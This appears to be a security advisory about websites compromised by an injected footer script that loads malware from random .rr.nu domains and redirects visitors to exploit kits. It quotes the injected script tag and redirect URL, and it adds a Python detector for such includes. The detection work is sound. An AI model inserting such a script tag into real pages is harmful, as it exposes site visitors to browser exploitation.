No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.
This is what gets added to the footer of the hacked sites:
<script src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>
Once loaded, it performs another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (random domain, but using the parameters h=1&s=pmg), which will then attempt to exploit the visitor's browser using multiple exploit kits.
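To check a site's pages for this injection, the added example below (not code from the original post) parses the HTML and flags any script include served from a .rr.nu host, labelling the two URL shapes described above. The function and class names are hypothetical, and the sample page is constructed around the script tag quoted in the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

SUSPECT_SUFFIX = ".rr.nu"  # TLD named in the post

# Constructed sample page: one legitimate include plus the injected footer tag.
SAMPLE_PAGE = """<html><body><p>Welcome</p>
<script src="/js/site.js"></script>
<script src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>
</body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value.strip())


def find_rr_nu_injections(html):
    """Return (url, reason) pairs for script includes hosted under .rr.nu."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        parts = urlsplit(src)
        host = (parts.hostname or "").lower().rstrip(".")
        if not host.endswith(SUSPECT_SUFFIX):
            continue  # the subdomain is random, so match on the suffix only
        query = parse_qs(parts.query)
        if parts.path.endswith("/pmg.php") and "dr" in query:
            reason = "first-stage loader (pmg.php?dr=)"
        elif query.get("s") == ["pmg"]:
            reason = "second-stage redirect (s=pmg)"
        else:
            reason = "script from .rr.nu host"
        findings.append((src, reason))
    return findings


if __name__ == "__main__":
    for url, reason in find_rr_nu_injections(SAMPLE_PAGE):
        print(f"{reason}: {url}")
```

Run it over the rendered output of each page as well as the theme footer files, since the tag is appended to the footer of the hacked sites.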
